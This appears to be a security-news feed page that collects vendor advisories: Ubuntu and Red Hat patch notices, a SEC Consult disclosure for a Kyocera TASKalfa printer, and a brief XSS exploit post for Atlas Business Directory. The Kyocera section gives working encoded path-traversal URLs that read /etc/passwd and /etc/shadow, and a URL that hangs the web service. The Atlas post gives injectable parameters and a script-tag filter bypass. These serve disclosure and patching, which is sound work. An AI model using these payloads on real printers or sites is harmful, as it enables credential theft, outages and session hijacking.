Ubuntu Security Notice 6210-1 - It was discovered that Doorkeeper incorrectly performed authorization checks for public clients that have been previous approved. An attacker could potentially exploit these in order to impersonate another user and obtain sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6210-1  
July 07, 2023

ruby-doorkeeper vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)

Summary:

Doorkeeper could be made to expose sensitive information over the  
network.

Software Description:  
- ruby-doorkeeper: OAuth 2 provider for Rails and Grape

Details:

It was discovered that Doorkeeper incorrectly performed authorization checks  
for public clients that have been previous approved. An attacker could  
potentially exploit these in order to impersonate another user and obtain  
sensitive information.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
  ruby-doorkeeper                 5.5.0-2ubuntu0.23.04.1

Ubuntu 22.10:  
  ruby-doorkeeper                 5.5.0-2ubuntu0.22.10.1

Ubuntu 22.04 LTS:  
  ruby-doorkeeper                 5.5.0-2ubuntu0.22.04.1

Ubuntu 20.04 LTS:  
  ruby-doorkeeper                 5.0.2-2ubuntu0.1

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
  ruby-doorkeeper                 4.3.1-1ubuntu0.1~esm1

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
  ruby-doorkeeper                 2.2.1-1ubuntu0.1~esm1

After a standard system update you need to restart any applications using  
Doorkeeper to make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6210-1  
  CVE-2023-34246

Package Information:  
  https://launchpad.net/ubuntu/+source/ruby-doorkeeper/5.5.0-2ubuntu0.23.04.1  
  https://launchpad.net/ubuntu/+source/ruby-doorkeeper/5.5.0-2ubuntu0.22.10.1  
  https://launchpad.net/ubuntu/+source/ruby-doorkeeper/5.5.0-2ubuntu0.22.04.1  
  https://launchpad.net/ubuntu/+source/ruby-doorkeeper/5.0.2-2ubuntu0.1

Ubuntu Security Notice USN-6210-1

Kyocera TASKalfa 4053ci versions 2VG_S000.002.561 and below suffers from path traversal, user enumeration, and denial of service vulnerabilities.

SEC Consult Vulnerability Lab Security Advisory < 20230705-0 >  
=======================================================================  
               title: Path traversal bypass & Denial of service  
             product: Kyocera TASKalfa 4053ci printer  
  vulnerable version: TASKalfa 4053ci Version <= 2VG_S000.002.561  
       fixed version: 2VG_S000.002.574  
         CVE numbers: CVE-2023-34259, CVE-2023-34260, CVE-2023-34261  
              impact: High  
            homepage: https://global.kyocera.com  
               found: 2022-12-13  
                  by: Stefan Michlits (Office Vienna)  
                      Gorazd Jank (Office Vienna)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Eviden business  
                      Europe | Asia

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"Kyocera Document Solutions is leading the digital shift driving productivity  
and growth in the printing industry. We offer a range of exciting new options  
that draw on the combined resources of the Kyocera Group."

Source: https://www.kyoceradocumentsolutions.com/en/our-business/inkjet/

Business recommendation:  
------------------------  
SEC Consult recommends Kyocera customers to install the latest updates.

Furthermore, an in-depth security analysis performed by security professionals  
is highly advised, as the software may be affected from other security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Path Traversal - Bypass (CVE-2023-34259)  
A path traversal vulnerability was found by Hakan Eren ŞAN in 2020-06-06.  
The previous exploit can be found at: https://www.exploit-db.com/exploits/48561  
Kyocera has fixed the vulnerability. It was not possible to access arbitrary  
files using the public exploit. However, SEC Consult have found a bypass to  
exploit this vulnerability again and access arbitrary files. Due to the fact  
that the web service is running as the user root, it was possible to access all  
files (e.g. /etc/shadow) on the device.

2) Denial-of-Service - Web Interface (CVE-2023-34260)  
The denial-of-service vulnerability is related to the path traversal  
vulnerability. Instead of requesting a file, a directory will be requested.  
Once the request is sent to the web service running on TCP port 443, the web  
service will become unresponsive and must be restarted.

3) User Enumeration (CVE-2023-34261)  
The login function on the web service running on TCP port 443 is prone to a  
user enumeration vulnerability. The login function will return different  
responses, whether the username is valid or not.

Proof of concept:  
-----------------  
1) Path Traversal - Bypass (CVE-2023-34259)  
Previously, a security researcher has discovered an unauthenticated directory  
traversal vulnerability in the web service running on port 443. The following  
payload was used to access arbitrary files:

https://IP/wlmeng/../../../../../../../../../../../etc/passwd%00index.htm

This vulnerability is fixed in the current version. It was not possible to  
access arbitrary files using the above payload. However, the vulnerability was  
not fixed correctly. SEC Consult identified a bypass to exploit this  
vulnerability again.

Once the ../ sequences will be URL encoded, it is possible to bypass the fix  
and access arbitrary files. The following payload can be used to access the  
file /etc/passwd:

https://IP/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd%00index.htm

The response containing the contents of the file /etc/passwd can be seen  
in the following paragraph.  
-------------------------------------------------------------------------------  
HTTP/1.1 200 OK  
Content-Length: 770  
Accept-Encoding: identity  
Server: KM-MFP-http/V0.0.1  
Content-Type: text/html  
X-Frame-Options: SAMEORIGIN

root:x:0:0:root:/root:/bin/sh  
daemon:x:1:1:daemon:/usr/sbin:/bin/sh  
bin:x:2:2:bin:/bin:/bin/sh  
sys:x:3:3:sys:/dev:/bin/sh  
sync:x:4:65534:sync:/bin:/bin/sync  
games:x:5:60:games:/usr/games:/bin/sh  
man:x:6:12:man:/var/cache/man:/bin/sh  
lp:x:7:7:lp:/var/spool/lpd:/bin/sh  
mail:x:8:8:mail:/var/mail:/bin/sh  
news:x:9:9:news:/var/spool/news:/bin/sh  
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh  
proxy:x:13:13:proxy:/bin:/bin/sh  
www-data:x:33:33:www-data:/var/www:/bin/sh  
backup:x:34:34:backup:/var/backups:/bin/sh  
list:x:38:38:Mailing List Manager:/var/list:/bin/sh  
irc:x:39:39:ircd:/var/run/ircd:/bin/sh  
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh  
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh  
sshd:x:100:1000:Linux User,,,:/var/run/sshd:/bin/false  
-------------------------------------------------------------------------------

Also, it was possible to access the file /etc/shadow. The following payload can  
be used:

https://IP/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/shadow%00index.htm

The output containing the content of the file /etc/shadow as it can be seen in  
the following paragraph.  
-------------------------------------------------------------------------------  
HTTP/1.1 200 OK  
Content-Length: 401  
Accept-Encoding: identity  
Server: KM-MFP-http/V0.0.1  
Content-Type: text/html  
X-Frame-Options: SAMEORIGIN

root:$1$tfE2pkl/$O8uDq*************bSH.:11029::::::  
daemon:*:11029::::::  
bin:*:11029::::::  
sys:*:11029::::::  
sync:*:11029::::::  
games:*:11029::::::  
man:*:11029::::::  
lp:*:11029::::::  
mail:*:11029::::::  
news:*:11029::::::  
uucp:*:11029::::::  
proxy:*:11029::::::  
www-data:*:11029::::::  
backup:*:11029::::::  
list:*:11029::::::  
irc:*:11029::::::  
gnats:*:11029::::::  
nobody:*:11029::::::  
sshd:x:11029::::::  
-------------------------------------------------------------------------------  
As the web service is running as the user root it was possible to access the  
/etc/shadow file or the file has set the wrong permissions.

Based on previous security assessments of Kyocera printers, it is likely that  
the service is running as the user root.

2) Denial-of-Service - Web Interface (CVE-2023-34260)  
To trigger the DoS attack it is sufficient to navigate to the URL:

https://IP/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%00index.htm

Once the request is sent to the web service, the web service will become  
unresponsive.

This attack is related to the path traversal vulnerability. The difference is  
that in this case a folder is requested instead of a file. Apparently, this  
leads to an error condition in the web server causing it to be unresponsive for  
all users. Other applications offering a web interface (e.g., on port 8083)  
seem to not be affected by the attack.

3) User Enumeration (CVE-2023-34261)  
The user enumeration is located in the login functionality of the web  
interface. Submitting an existing username will result in a different server  
response than submitting an incorrect username. This enables attackers to  
enumerate existing users by submitting potential usernames till a different  
response is gathered. In this case, it does not matter whether the transmitted  
password is correct or not. The gathered information could be used to better  
search for default passwords or custom passwords inside of public password  
leaks.  
In case, the username does not exist, the response will return  
"Login-Benutzername oder Passwort falsch.", on the other hand, if the  
username exists the response contains "Sie können sich nicht einloggen."

Vulnerable / tested versions:  
-----------------------------  
The following product has been tested:  
* Kyocera TASKalfa 4053ci

All versions older than "2VG_S000.002.561" are vulnerable according to the vendor.

Vendor contact timeline:  
------------------------  
2023-02-13: Asking for Kyocera KC-SIRT security contact through Nippon CSIRT  
             Association; quick response: https://www.nca.gr.jp/member/kc-sirt.html  
             (it seems only the Japanese website shows the email information)  
2023-02-14: Contacting Kyocera KC-SIRT through kc-sirt@gp.kyocera.jp  
2023-03-02: Contacting the vendor again, due to no response.  
2023-03-06: Vendor response, KDC-PSIRT is responsible, requesting security advisory.  
2023-03-13: Sending security advisory PGP-encrypted.  
2023-04-19: Vendor response, vulnerabilities confirmed.  
2023-05-19: Vendor response, the vulnerabilities were fixed. The patch will be  
             released on 2023-05-26.  
2023-05-22: Informing vendor that we will request CVE numbers, asking for  
             information about affected & fixed version numbers.  
2023-05-24: Vendor provides version information.  
2023-06-02: Sending CVE numbers to vendor, asking for link to patch download.  
2023-06-05: Vendor provides download information.  
2023-07-05: Public release of security advisory.

Solution:  
---------  
The vendor provided the following download information:

There are two ways to update the firmware of our products.  
* One is to contact the shop of purchase and update the firmware from a service person.  
* The other is to use the Firmware Upgrade tool. From the Kyocera Document Solutions  
   Global website in your country, you can download this tool and latest firmware.  
   Then you update the firmware yourself.  
   See: https://www.kyoceradocumentsolutions.com/download/ and choose "TASKalfa4053ci"

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab  
An integrated part of SEC Consult, an Eviden business  
Europe | Asia

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Eviden business. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF S. Michlits, G. Jank / @2023

Kyocera TASKalfa 4053ci 2VG_S000.002.561 Path Traversal / Denial Of Service

Red Hat Security Advisory 2023-4020-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include double free and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kernel security and bug fix update  
Advisory ID:       RHSA-2023:4020-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4020  
Issue date:        2023-07-11  
CVE Names:         CVE-2022-3564   
=====================================================================

1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 7.4  
Advanced Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Server AUS (v. 7.4) - noarch, x86_64  
Red Hat Enterprise Linux Server Optional AUS (v. 7.4) - x86_64

3. Description:

The kernel packages contain the Linux kernel, the core of any Linux  
operating system.

Security Fix(es):

* kernel: use-after-free caused by l2cap_reassemble_sdu() in  
net/bluetooth/l2cap_core.c (CVE-2022-3564)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* The iscsi target deadlocks when the same host acts as an initiator to  
itself (i.e. connects via 127.0.0.1) (BZ#2184012)

* Double free issue in filelayout_alloc_commit_info (BZ#2212887)

* RHEL 7.2 XFS inode cluster corruption (BZ#2213362)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2150999 - CVE-2022-3564 kernel: use-after-free caused by l2cap_reassemble_sdu() in net/bluetooth/l2cap_core.c

6. Package List:

Red Hat Enterprise Linux Server AUS (v. 7.4):

Source:  
kernel-3.10.0-693.111.1.el7.src.rpm

noarch:  
kernel-abi-whitelists-3.10.0-693.111.1.el7.noarch.rpm  
kernel-doc-3.10.0-693.111.1.el7.noarch.rpm

x86_64:  
kernel-3.10.0-693.111.1.el7.x86_64.rpm  
kernel-debug-3.10.0-693.111.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-693.111.1.el7.x86_64.rpm  
kernel-debug-devel-3.10.0-693.111.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-693.111.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-693.111.1.el7.x86_64.rpm  
kernel-devel-3.10.0-693.111.1.el7.x86_64.rpm  
kernel-headers-3.10.0-693.111.1.el7.x86_64.rpm  
kernel-tools-3.10.0-693.111.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-693.111.1.el7.x86_64.rpm  
kernel-tools-libs-3.10.0-693.111.1.el7.x86_64.rpm  
perf-3.10.0-693.111.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-693.111.1.el7.x86_64.rpm  
python-perf-3.10.0-693.111.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-693.111.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional AUS (v. 7.4):

x86_64:  
kernel-debug-debuginfo-3.10.0-693.111.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-693.111.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-693.111.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-693.111.1.el7.x86_64.rpm  
kernel-tools-libs-devel-3.10.0-693.111.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-693.111.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-693.111.1.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-3564  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkrSWvAAoJENzjgjWX9erEy64P+weB8xLhnEvx9mRrw8Xe4dVo  
7iPtsiZ6Dh/iN3/R4S7QvtccvGGjSCtGSoHwWbK/1idY0q3h137lBDyZmcbNWNNG  
GBXLQ8vFrRwLBi/t1ksbgZ0s5J+05wSMArkZTG8Omp9jtsI4SvBmeioM+YrAeWRg  
JAhd6J6pJe0Nwc41s5s3f3xiepjYnXXyWhYFadFeslPjoE+otngtCMYkwrzCfMCz  
iG9pPBaT7PC9b994AYct9E4zjJrhOl8S/59y41cxFtNruLtaixvhNVHewkcGyLVP  
6RZ/vg9RM+GbHfxMVlU0bGbdcHa0Nn0hPU2cqF0ynvUpDEKEHF6ZeZvwpeaJqY98  
2nfLwRgM17yJSkDrixoP1E4fgQTQ8WngeImkyhlZHrGh+C5nJlIMIm7xK3ZK/UUx  
Tx1l7TsRA/q/S7l4wsIe/WVwcJ3i9QacJsTkb/ZNK1ZC+BhRwImgTgVEJEe0vZLI  
JUm+WuAsGDiJ3C7X1lLQT0Nb1kNFJAoqrVGqio/an+WphZbq7a0+CM4nMR+p7A5r  
fylgdagozRgC1Gm3c30QqbPIF3+M7tn9V4mbWUmaIUVEkAC0SlTjcFrHO6iiCBW2  
OPTMYpUTnh7kS8QY9vutgxuwfaxI/IZUl2W2c8FPaSQclUJBtt83vjbMowG2Vk4S  
JTIRgcMerL6RbvC0d9b9  
=HymQ  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4020-01

Atlas Business Directory Listing version 2.13 suffers from cross site scripting vulnerabilities.

    # Exploit Title: Atlas Business Directory Listing 2.13 - Reflected XSS# Exploit Author: CraCkEr# Date: 09/07/2023# Vendor: Creativeitem# Vendor Homepage: https://creativeitem.com/# Software Link: https://demo.creativeitem.com/atlas/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site ## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /atlas/home/filter_listingsGET parameter 'price-range' is vulnerable to XSShttps://website/atlas/home/filter_listings?category=family-style&&amenity=good-for-kids&&city=marseille&&price-range=790[XSS]&&video=1&&status=openPath: /atlas/home/searchGET parameter 'search_string' is vulnerable to XSShttps://website/atlas/home/search?search_string=[XSS]&selected_city_id=&selected_category_id=11Simple XSS Payload (Blocked by WAF) : <script>alert(1)</script> XSS Filter Bypass : "><script>alert(1)</script>[-] Done

Atlas Business Directory Listing 2.13 Cross Site Scripting

OATH Toolkit attempts to collect several tools that are useful when deploying technologies related to OATH, such as HOTP one-time passwords. It is a fork of the earlier HOTP Toolkit.

OATH Toolkit 2.6.9

Botan is a C++ library of cryptographic algorithms, including AES, DES, SHA-1, RSA, DSA, Diffie-Hellman, and many others. It also supports X.509 certificates and CRLs, and PKCS #10 certificate requests, and has a high level filter/pipe message processing system. The library is easily portable to most systems and compilers, and includes a substantial tutorial and API reference. This is the current stable release.

Botan C++ Crypto Algorithms Library 3.1.0

Red Hat Security Advisory 2023-4022-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include double free, privilege escalation, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kernel security and bug fix update  
Advisory ID:       RHSA-2023:4022-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4022  
Issue date:        2023-07-11  
CVE Names:         CVE-2022-2588   
=====================================================================

1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 7.7  
Advanced Update Support, Red Hat Enterprise Linux 7.7 Telco Extended Update  
Support, and Red Hat Enterprise Linux 7.7 Update Services for SAP  
Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Server AUS (v. 7.7) - noarch, x86_64  
Red Hat Enterprise Linux Server E4S (v. 7.7) - noarch, ppc64le, x86_64  
Red Hat Enterprise Linux Server Optional AUS (v. 7.7) - x86_64  
Red Hat Enterprise Linux Server Optional E4S (v. 7.7) - ppc64le, x86_64  
Red Hat Enterprise Linux Server Optional TUS (v. 7.7) - x86_64  
Red Hat Enterprise Linux Server TUS (v. 7.7) - noarch, x86_64

3. Description:

The kernel packages contain the Linux kernel, the core of any Linux  
operating system.

Security Fix(es):

* kernel: a use-after-free in cls_route filter implementation may lead to  
privilege escalation (CVE-2022-2588)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* The iscsi target deadlocks when the same host acts as an initiator to  
itself (i.e. connects via 127.0.0.1) (BZ#2183540)

* Double free issue in filelayout_alloc_commit_info (BZ#2212868)

* RHEL 7.2: XFS inode cluster corruption (BZ#2213360)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2114849 - CVE-2022-2588 kernel: a use-after-free in cls_route filter implementation may lead to privilege escalation

6. Package List:

Red Hat Enterprise Linux Server AUS (v. 7.7):

Source:  
kernel-3.10.0-1062.76.1.el7.src.rpm

noarch:  
kernel-abi-whitelists-3.10.0-1062.76.1.el7.noarch.rpm  
kernel-doc-3.10.0-1062.76.1.el7.noarch.rpm

x86_64:  
bpftool-3.10.0-1062.76.1.el7.x86_64.rpm  
bpftool-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-debug-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-debug-devel-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-devel-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-headers-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-tools-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-tools-libs-3.10.0-1062.76.1.el7.x86_64.rpm  
perf-3.10.0-1062.76.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
python-perf-3.10.0-1062.76.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server E4S (v. 7.7):

Source:  
kernel-3.10.0-1062.76.1.el7.src.rpm

noarch:  
kernel-abi-whitelists-3.10.0-1062.76.1.el7.noarch.rpm  
kernel-doc-3.10.0-1062.76.1.el7.noarch.rpm

ppc64le:  
bpftool-3.10.0-1062.76.1.el7.ppc64le.rpm  
bpftool-debuginfo-3.10.0-1062.76.1.el7.ppc64le.rpm  
kernel-3.10.0-1062.76.1.el7.ppc64le.rpm  
kernel-bootwrapper-3.10.0-1062.76.1.el7.ppc64le.rpm  
kernel-debug-3.10.0-1062.76.1.el7.ppc64le.rpm  
kernel-debug-debuginfo-3.10.0-1062.76.1.el7.ppc64le.rpm  
kernel-debuginfo-3.10.0-1062.76.1.el7.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-3.10.0-1062.76.1.el7.ppc64le.rpm  
kernel-devel-3.10.0-1062.76.1.el7.ppc64le.rpm  
kernel-headers-3.10.0-1062.76.1.el7.ppc64le.rpm  
kernel-tools-3.10.0-1062.76.1.el7.ppc64le.rpm  
kernel-tools-debuginfo-3.10.0-1062.76.1.el7.ppc64le.rpm  
kernel-tools-libs-3.10.0-1062.76.1.el7.ppc64le.rpm  
perf-3.10.0-1062.76.1.el7.ppc64le.rpm  
perf-debuginfo-3.10.0-1062.76.1.el7.ppc64le.rpm  
python-perf-3.10.0-1062.76.1.el7.ppc64le.rpm  
python-perf-debuginfo-3.10.0-1062.76.1.el7.ppc64le.rpm

x86_64:  
bpftool-3.10.0-1062.76.1.el7.x86_64.rpm  
bpftool-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-debug-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-debug-devel-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-devel-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-headers-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-tools-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-tools-libs-3.10.0-1062.76.1.el7.x86_64.rpm  
perf-3.10.0-1062.76.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
python-perf-3.10.0-1062.76.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server TUS (v. 7.7):

Source:  
kernel-3.10.0-1062.76.1.el7.src.rpm

noarch:  
kernel-abi-whitelists-3.10.0-1062.76.1.el7.noarch.rpm  
kernel-doc-3.10.0-1062.76.1.el7.noarch.rpm

x86_64:  
bpftool-3.10.0-1062.76.1.el7.x86_64.rpm  
bpftool-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-debug-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-debug-devel-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-devel-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-headers-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-tools-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-tools-libs-3.10.0-1062.76.1.el7.x86_64.rpm  
perf-3.10.0-1062.76.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
python-perf-3.10.0-1062.76.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional AUS (v. 7.7):

x86_64:  
bpftool-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-tools-libs-devel-3.10.0-1062.76.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional E4S (v. 7.7):

ppc64le:  
bpftool-debuginfo-3.10.0-1062.76.1.el7.ppc64le.rpm  
kernel-debug-debuginfo-3.10.0-1062.76.1.el7.ppc64le.rpm  
kernel-debug-devel-3.10.0-1062.76.1.el7.ppc64le.rpm  
kernel-debuginfo-3.10.0-1062.76.1.el7.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-3.10.0-1062.76.1.el7.ppc64le.rpm  
kernel-tools-debuginfo-3.10.0-1062.76.1.el7.ppc64le.rpm  
kernel-tools-libs-devel-3.10.0-1062.76.1.el7.ppc64le.rpm  
perf-debuginfo-3.10.0-1062.76.1.el7.ppc64le.rpm  
python-perf-debuginfo-3.10.0-1062.76.1.el7.ppc64le.rpm

x86_64:  
bpftool-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-tools-libs-devel-3.10.0-1062.76.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional TUS (v. 7.7):

x86_64:  
bpftool-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-tools-libs-devel-3.10.0-1062.76.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-2588  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
